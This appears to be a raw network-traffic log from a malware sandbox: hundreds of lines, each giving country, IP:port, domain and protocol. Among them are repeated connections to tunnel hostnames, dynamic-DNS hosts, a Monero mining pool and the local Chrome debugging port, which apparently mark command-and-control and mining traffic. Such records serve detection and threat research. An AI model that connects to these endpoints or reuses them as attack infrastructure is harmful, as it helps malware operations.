HK 156.225.19.202:80 paonancs.cn tcp
AF 149.54.35.210:40500 udp
RU 185.215.113.67:21405 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
BG 195.230.23.72:80 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 210.35.54.149.in-addr.arpa udp
US 8.8.8.8:53 202.19.225.156.in-addr.arpa udp
RU 80.66.75.114:80 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
US 20.83.148.22:80 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
MX 201.108.200.21:40500 udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 21.200.108.201.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
KZ 178.89.183.83:40500 udp
US 8.8.8.8:53 83.183.89.178.in-addr.arpa udp
RU 80.66.75.114:80 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 154.216.17.90:80 tcp
AO 129.122.183.25:40500 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 25.183.122.129.in-addr.arpa udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.164.28:40500 udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 28.164.156.90.in-addr.arpa udp
UZ 195.158.22.210:40500 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
IR 5.232.155.0:40500 udp
US 8.8.8.8:53 0.155.232.5.in-addr.arpa udp
RU 185.215.113.67:21405 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
GB 20.26.156.215:443 github.com tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
UZ 94.141.69.122:40500 udp
DE 185.218.125.157:21441 tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 122.69.141.94.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
DE 185.218.125.157:21441 tcp
RU 92.244.232.104:40500 udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 104.232.244.92.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
AF 149.54.20.134:40500 udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 134.20.54.149.in-addr.arpa udp
US 8.8.8.8:53 claywyaeropumps.com udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.160.54:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 54.160.156.90.in-addr.arpa udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
CN 183.57.21.131:8095 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
GT 190.56.14.82:40500 udp
DE 185.218.125.157:21441 tcp
IR 46.248.34.105:40500 tcp
US 8.8.8.8:53 82.14.56.190.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
UZ 90.156.163.10:40500 udp
US 8.8.8.8:53 10.163.156.90.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
RU 94.230.44.71:40500 udp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 71.44.230.94.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 154.216.17.90:80 tcp
BG 195.230.23.72:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
DE 185.218.125.157:21441 tcp
UZ 86.62.3.67:40500 udp
GB 20.26.156.215:443 github.com tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 67.3.62.86.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
MX 189.141.139.39:40500 udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 39.139.141.189.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
YE 94.26.219.44:40500 udp
RU 185.215.113.43:80 185.215.113.43 tcp
US 8.8.8.8:53 44.219.26.94.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
UZ 89.249.62.7:40500 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
RU 185.215.113.67:21405 tcp
RU 185.215.113.43:80 185.215.113.43 tcp
DE 185.218.125.157:21441 tcp
KZ 88.204.241.182:40500 udp
N/A 127.0.0.1:58963 tcp
US 8.8.8.8:53 182.241.204.88.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 funletters.net udp
US 208.122.221.162:80 funletters.net tcp
DE 185.218.125.157:21441 tcp
HK 134.122.129.19:80 134.122.129.19 tcp
US 8.8.8.8:53 19.129.122.134.in-addr.arpa udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
IR 2.181.252.24:40500 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 24.252.181.2.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
UZ 217.30.162.244:40500 udp
US 8.8.8.8:53 244.162.30.217.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 185.215.113.84:80 185.215.113.84 tcp
BG 195.230.23.72:80 tcp
UZ 92.38.19.10:40500 udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 10.19.38.92.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 83.239.55.170:40500 udp
US 8.8.8.8:53 170.55.239.83.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
NL 178.132.2.10:4000 tcp
KZ 178.91.167.50:40500 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
UZ 195.158.18.194:40500 udp
RU 185.215.113.67:21405 tcp
US 8.8.8.8:53 194.18.158.195.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 154.216.17.90:80 tcp
KZ 37.99.54.230:40500 udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 230.54.99.37.in-addr.arpa udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
DE 185.218.125.157:21441 tcp
SY 77.44.198.123:40500 udp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
NL 38.180.123.95:3232 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 123.198.44.77.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
UZ 89.236.218.158:40500 udp
US 8.8.8.8:53 158.218.236.89.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
CN 150.158.37.254:80 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
NL 89.110.69.103:80 tcp
KZ 5.76.0.203:40500 udp
US 8.8.8.8:53 203.0.76.5.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 20.83.148.22:80 tcp
DE 94.156.177.33:80 94.156.177.33 tcp
NL 89.110.69.103:80 tcp
RU 185.215.113.66:80 twizt.net tcp
KZ 31.171.185.170:40500 tcp
DE 185.218.125.157:21441 tcp
UZ 93.188.85.2:40500 udp
US 8.8.8.8:53 2.85.188.93.in-addr.arpa udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
RU 185.215.113.67:21405 tcp
CN 150.158.37.254:80 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
RU 185.215.113.66:80 twizt.net tcp
KG 212.112.121.59:40500 udp
US 8.8.8.8:53 59.121.112.212.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
US 8.8.8.8:53 141.233.202.91.in-addr.arpa udp
NL 38.180.123.95:3232 tcp
IR 46.167.149.255:40500 udp
US 8.8.8.8:53 255.149.167.46.in-addr.arpa udp
CN 183.57.21.131:8095 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
UZ 213.230.99.119:40500 udp
US 8.8.8.8:53 119.99.230.213.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:9222 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
CN 183.57.21.131:8095 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
BG 195.230.23.72:80 tcp
MX 189.167.22.36:40500 udp
KZ 178.88.234.149:40500 tcp
US 8.8.8.8:53 36.22.167.189.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
BG 195.230.23.72:80 tcp
IR 2.181.218.27:40500 udp
KR 221.143.49.222:80 221.143.49.222 tcp
US 8.8.8.8:53 27.218.181.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 222.49.143.221.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
NL 38.180.123.95:3232 tcp
US 20.83.148.22:80 tcp
KR 221.143.49.222:80 221.143.49.222 tcp
SY 178.253.109.195:40500 udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
US 8.8.8.8:53 195.109.253.178.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
UZ 87.237.236.86:40500 udp
US 8.8.8.8:53 86.236.237.87.in-addr.arpa udp
KZ 89.218.238.106:40500 udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 106.238.218.89.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
BG 195.230.23.72:80 tcp
GB 89.35.131.209:80 sanboxland.pro tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
KG 212.112.107.11:40500 udp
US 8.8.8.8:53 login-donor.gl.at.ply.gg udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
UA 93.175.220.40:40500 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 claywyaeropumps.com udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
FR 163.172.171.111:10343 xmr-eu2.nanopool.org tcp
DE 185.218.125.157:21441 tcp
AO 102.219.187.80:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 111.171.172.163.in-addr.arpa udp
US 8.8.8.8:53 80.187.219.102.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
BG 195.230.23.72:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
KZ 5.76.2.36:40500 udp
US 8.8.8.8:53 36.2.76.5.in-addr.arpa udp
BG 195.230.23.72:80 tcp
N/A 127.0.0.1:8777 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 84.53.244.106:40500 udp
US 8.8.8.8:53 106.244.53.84.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 78.36.17.105:40500 udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
US 8.8.8.8:53 105.17.36.78.in-addr.arpa udp
TH 154.197.69.165:443 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
TH 154.197.69.165:443 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
N/A 127.0.0.1:8777 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
TH 154.197.69.165:443 tcp
KZ 31.169.15.229:40500 udp
TH 154.197.69.165:443 tcp
US 8.8.8.8:53 229.15.169.31.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
TJ 185.177.0.227:40500 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
BG 195.230.23.72:80 tcp
UZ 217.30.164.185:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 185.164.30.217.in-addr.arpa udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
NL 38.180.123.95:3232 tcp
BG 195.230.23.72:80 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
N/A 127.0.0.1:8777 tcp
RU 185.215.113.66:80 twizt.net tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
CN 101.200.220.118:8090 tcp
MX 187.235.150.54:40500 udp
US 8.8.8.8:53 54.150.235.187.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.162.48:40500 udp
US 8.8.8.8:53 48.162.156.90.in-addr.arpa udp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
CN 101.200.220.118:8090 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
TR 85.103.235.188:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 188.235.103.85.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
CN 101.200.220.118:8090 tcp
IR 185.123.69.47:40500 udp
US 8.8.8.8:53 47.69.123.185.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
KZ 178.91.91.13:40500 tcp
DE 185.218.125.157:21441 tcp
US 20.83.148.22:80 tcp
DE 185.218.125.157:21441 tcp
IR 176.67.79.229:40500 udp
US 8.8.8.8:53 229.79.67.176.in-addr.arpa udp
RU 185.215.113.67:21405 tcp
NL 38.180.123.95:3232 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:9222 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
YE 46.35.93.93:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 93.93.35.46.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 educational-reform.gl.at.ply.gg udp
BG 195.230.23.72:80 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
NL 178.132.2.10:4000 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
N/A 127.0.0.1:8777 tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 aukuqiksseyscgie.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
KZ 46.36.149.47:40500 udp
US 8.8.8.8:53 47.149.36.46.in-addr.arpa udp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
IR 93.118.99.152:40500 udp
CN 101.35.228.105:20443 tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 152.99.118.93.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
SY 95.212.73.0:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 0.73.212.95.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
TJ 185.177.0.227:40500 tcp
BG 195.230.23.72:80 tcp
NL 38.180.123.95:3232 tcp
US 20.83.148.22:80 tcp
CN 101.35.228.105:20443 tcp
RU 185.215.113.43:80 185.215.113.43 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 camp.zapto.org udp
RO 37.120.247.6:40500 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 6.247.120.37.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
RU 185.215.113.43:80 185.215.113.43 tcp
BG 195.230.23.72:80 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
RU 92.124.152.236:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 236.152.124.92.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 185.215.113.209:80 185.215.113.209 tcp
RU 185.215.113.206:80 185.215.113.206 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.43:80 185.215.113.43 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
DE 185.218.125.157:21441 tcp
KZ 92.47.143.122:40500 udp
US 8.8.8.8:53 122.143.47.92.in-addr.arpa udp
RU 185.215.113.43:80 185.215.113.43 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
KZ 178.89.189.131:40500 udp
US 8.8.8.8:53 131.189.89.178.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
BG 195.230.23.72:80 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
NL 38.180.123.95:3232 tcp
RU 178.67.165.88:40500 udp
YE 46.161.239.195:40500 tcp
US 8.8.8.8:53 88.165.67.178.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
RU 78.81.147.173:40500 udp
US 8.8.8.8:53 173.147.81.78.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 reddemon.xyz udp
US 66.29.153.21:443 reddemon.xyz tcp
BG 195.230.23.72:80 tcp
UZ 194.93.26.59:40500 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 21.153.29.66.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
MX 189.133.187.71:40500 udp
US 8.8.8.8:53 71.187.133.189.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 66.29.153.21:443 reddemon.xyz tcp
BG 195.230.23.72:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 91.122.218.118:40500 udp
US 8.8.8.8:53 118.218.122.91.in-addr.arpa udp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
UZ 89.249.62.87:40500 udp
US 8.8.8.8:53 87.62.249.89.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
CN 110.40.138.5:4545 tcp
YE 178.130.103.42:40500 udp
US 8.8.8.8:53 42.103.130.178.in-addr.arpa udp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
DE 94.156.177.33:80 94.156.177.33 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
MU 102.207.195.84:40500 udp
US 8.8.8.8:53 84.195.207.102.in-addr.arpa udp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 127.0.0.1:8777 tcp
US 20.83.148.22:80 tcp
MX 189.173.142.192:40500 tcp
AO 154.118.201.198:40500 udp
CN 110.40.138.5:4545 tcp
US 8.8.8.8:53 198.201.118.154.in-addr.arpa udp
NL 89.110.69.103:80 tcp
DE 94.156.177.33:80 94.156.177.33 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
US 8.8.8.8:53 claywyaeropumps.com udp
N/A 127.0.0.1:8777 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
BG 195.230.23.72:80 tcp
UZ 213.230.71.228:40500 udp
NL 89.110.69.103:80 tcp
US 8.8.8.8:53 228.71.230.213.in-addr.arpa udp
BG 195.230.23.72:80 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 camp.zapto.org udp
YE 134.35.158.149:40500 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 149.158.35.134.in-addr.arpa udp
UZ 90.156.194.146:40500 udp
RU 185.215.113.67:21405 tcp
US 8.8.8.8:53 146.194.156.90.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 ip-api.com udp
DE 185.218.125.157:21441 tcp
KZ 37.151.27.190:40500 udp
US 208.95.112.1:80 ip-api.com tcp
KZ 37.151.202.166:40500 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 190.27.151.37.in-addr.arpa udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
IR 195.181.23.242:40500 udp
N/A 127.0.0.1:9222 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 242.23.181.195.in-addr.arpa udp
IR 2.187.40.5:40500 udp
N/A 127.0.0.1:58963 tcp
NL 38.180.123.95:3232 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
GB 89.35.131.209:80 sanboxland.pro tcp
RU 94.51.68.160:40500 udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 160.68.51.94.in-addr.arpa udp
RU 185.215.113.209:80 185.215.113.209 tcp
BG 195.230.23.72:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
UZ 217.30.162.161:40500 udp
US 8.8.8.8:53 161.162.30.217.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
DE 193.161.193.99:25170 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
GB 89.35.131.209:80 sanboxland.pro tcp
BG 195.230.23.72:80 tcp
SG 216.107.138.162:40500 udp
US 8.8.8.8:53 162.138.107.216.in-addr.arpa udp
RU 185.215.113.209:80 185.215.113.209 tcp
DE 185.218.125.157:21441 tcp
IR 188.215.221.55:40500 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
IR 2.176.72.136:40500 udp
US 8.8.8.8:53 136.72.176.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
UZ 62.209.135.143:40500 udp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 143.135.209.62.in-addr.arpa udp
NL 178.132.2.10:4000 tcp
CN 120.46.212.33:4433 tcp
DE 185.218.125.157:21441 tcp
US 20.83.148.22:80 tcp
DE 185.218.125.157:21441 tcp
VE 190.202.1.132:40500 udp
US 8.8.8.8:53 132.1.202.190.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
CN 120.46.212.33:4433 tcp
BG 195.230.23.72:80 tcp
N/A 127.0.0.1:8777 tcp
RU 185.215.113.67:21405 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
IR 2.180.115.76:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 76.115.180.2.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
US 26.185.184.104:942 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
MX 201.108.200.21:40500 tcp
DE 193.161.193.99:25170 tcp
